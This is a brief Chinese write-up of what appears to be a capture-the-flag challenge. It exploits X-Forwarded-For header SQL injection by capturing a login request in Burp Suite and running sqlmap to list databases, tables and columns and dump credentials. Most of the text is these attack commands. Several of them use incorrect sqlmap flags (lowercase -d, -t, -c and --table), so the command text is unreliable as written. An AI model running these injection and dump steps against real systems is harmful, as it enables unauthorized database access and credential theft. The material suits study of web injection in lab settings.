先尝试admin/admin看到提示框,由于我的弹框是乱码,不会解决,哪位大佬会的话麻烦评论一下
然后猜测是要用这个ip访问,后来看了别人的简书,提示内容大致是登录失败,ip已被记录,所以存在X-Forwarded-For注入
burpsuit抓包
然后保存为名为xxx.txt的文件
sqlmap进行爆破
sqlmap.py -r xxx.txt --dbs --batch
爆数据库
sqlmap.py -r xxx.txt -d 数据库名 --table --batch爆表名
sqlmap.py -r xxx.txt -d 数据库名 -t 表名 --columns --batch爆字段
sqlmap.py -r xxx.txt -d 数据库名 -t 表名 -c '字段名' --dump --batch爆字段值
或许直接一句话爆破
结果到电脑用户文件夹下的.sqlmap里查看
sqlmap.py -r xxx.txt --dump --batch
两两进行自由组合,最后登陆成功,拿到key
